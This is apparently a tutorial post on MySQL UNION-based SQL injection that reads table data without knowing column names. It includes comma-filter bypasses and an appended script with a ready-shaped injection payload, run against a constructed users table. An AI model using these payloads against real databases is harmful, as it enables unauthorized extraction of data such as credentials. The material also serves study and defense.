MySQL injection: extracting data when the column names are filtered or unknown

Last night I learned a trick for pulling data out through injection without knowing the column names, and tried it straight away. The core idea is to UNION a controllable virtual table V1 with the real table V2 that we want to read (union select). Because the UNION result takes its column names from V1, the column names become ours to choose, and the data in V2 can then be queried through them.

First, build a virtual table with the same number of columns as the target table (the column count has to match, otherwise MySQL rejects the UNION):

mysql> select * from ((select 1)a,(select 2)b,(select 3)c);
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
1 row in set (0.00 sec)

The DUAL table works too (FROM DUAL is optional in MySQL, but it keeps the SELECT well-formed):

mysql> select 1,2,3 from DUAL;
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
1 row in set (0.00 sec)

Now UNION this virtual table with the table we want to inject from. The numeric placeholders must come first: a UNION names its result columns after the first SELECT, so the result columns are called 1, 2 and 3 whatever the real column names are.

mysql> select 1,2,3 from DUAL union select * from users;
+-----+----------------------+------+
| 1   | 2                    | 3    |
+-----+----------------------+------+
|   1 | 2                    | 3    |
|   1 | 0                    | aaaa |
|   2 | Angelina             | aaaa |
|   3 | Dummy                | aaaa |
|   4 | secure               | aaaa |
|   5 | stupid               | aaaa |
|   6 | superman             | aaaa |
|   7 | batman               | aaaa |
|   8 | admin                | aaaa |
|   9 | admin1               | aaaa |
|  10 | admin2               | aaaa |
|  11 | admin3               | aaaa |
|  12 | dhakkan              | aaaa |
|  14 | admin4               | aaaa |
|  15 | Homaebic             | aaaa |
|  16 | admin                | aaaa |
|  18 | admin                | aaaa |
| 100 | homaebic             | aaaa |
| 101 | homaebic'            | aaaa |
+-----+----------------------+------+
19 rows in set (0.00 sec)

The column names of this result are now under our control. Wrap it as a derived table aliased a, and a specific column can be addressed as a.3 (the column is literally named 3; quoting it with backticks, a.`3`, works as well):

mysql> select a.3 from (select 1,2,3 from DUAL union select * from users)a;
+------+
| 3    |
+------+
| 3    |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
| aaaa |
+------+
19 rows in set (0.00 sec)

Selecting a specific row. Row 0 of the result is the dummy row (1,2,3), so LIMIT 3,1 returns the third users row:

mysql> select a.3 from (select 1,2,3 from DUAL union select * from users)a limit 3,1;
+------+
| 3    |
+------+
| aaaa |
+------+
1 row in set (0.00 sec)

If commas are filtered, the three-column dummy row can be assembled with JOIN instead of a comma-separated list, and LIMIT m,n can be written as LIMIT n OFFSET m:

mysql> select d.3 from (select * from (select 1)a join (select 2)b join (select 3)c union select * from users)d limit 1 offset 3;
+------+
| 3    |
+------+
| aaaa |
+------+
1 row in set (0.00 sec)
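As an added example, not part of the original post: a stand-alone MySQL script that walks through the whole technique on a constructed `users` table, then shows the same extraction written as a subquery inside an injectable WHERE clause and in the comma-free form. The `users` and `products` tables and their columns are hypothetical, made up so the script runs offline; in a real injection the column names are exactly what the attacker does not know.

```sql
-- Added worked example (not from the original post): the column-name-agnostic
-- UNION trick end to end on a constructed table. Names are hypothetical.
CREATE TABLE users (
    id       INT PRIMARY KEY,
    username VARCHAR(32),
    password VARCHAR(32)
);
INSERT INTO users VALUES
    (1, 'Dumb',     'Dumb'),
    (2, 'Angelina', 'I-kill-you'),
    (8, 'admin',    'admin');

-- Step 1: the dummy SELECT must have as many columns as the target table.
-- With a wrong count MySQL rejects the whole statement:
--   ERROR 1222 (21000): The used SELECT statements have a different number of columns
-- SELECT 1,2 UNION SELECT * FROM users;

-- Step 2: a UNION names its result columns after the FIRST select, so the
-- literals 1,2,3 become the column names and the real names never matter.
-- Row 0 of the result is the dummy row (1,2,3); the real rows follow it.
SELECT 1,2,3 UNION SELECT * FROM users;

-- Step 3: alias the union as a derived table and address the target's
-- second column as a.2 (a.`2` with backticks is equivalent).
-- OFFSET 1 skips the dummy row, so this returns the first user's username.
SELECT a.2 FROM (SELECT 1,2,3 UNION SELECT * FROM users) a LIMIT 1 OFFSET 1;

-- Step 4: pull a whole column in a single value with GROUP_CONCAT.
-- The dummy row contributes a leading '2'; everything after it is real data.
SELECT GROUP_CONCAT(a.2) FROM (SELECT 1,2,3 UNION SELECT * FROM users) a;

-- Step 5: the shape this takes inside an injectable numeric WHERE clause.
-- Hypothetical vulnerable query:  SELECT * FROM products WHERE id = <input>
-- Attacker input:                  -1 UNION SELECT 1,(...),3
-- The -1 matches nothing, so the only row returned is the injected one.
CREATE TABLE products (id INT, name VARCHAR(64), price INT);
INSERT INTO products VALUES (1, 'widget', 10);
SELECT * FROM products WHERE id = -1
UNION SELECT 1,(SELECT GROUP_CONCAT(a.2)
                  FROM (SELECT 1,2,3 UNION SELECT * FROM users) a),3;

-- Step 6: comma-free variant for filters that block ','. JOIN assembles the
-- three-column dummy row and LIMIT ... OFFSET replaces LIMIT m,n.
SELECT d.2
FROM (SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c
      UNION SELECT * FROM users) d
LIMIT 1 OFFSET 1;
```

Two caveats worth keeping in mind when using the LIMIT form: the SQL standard does not guarantee the row order of a UNION without ORDER BY, so the dummy row landing at offset 0 is MySQL behaviour rather than a promise, and UNION without ALL removes duplicate rows, so two target rows that are identical in every column collapse into one.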
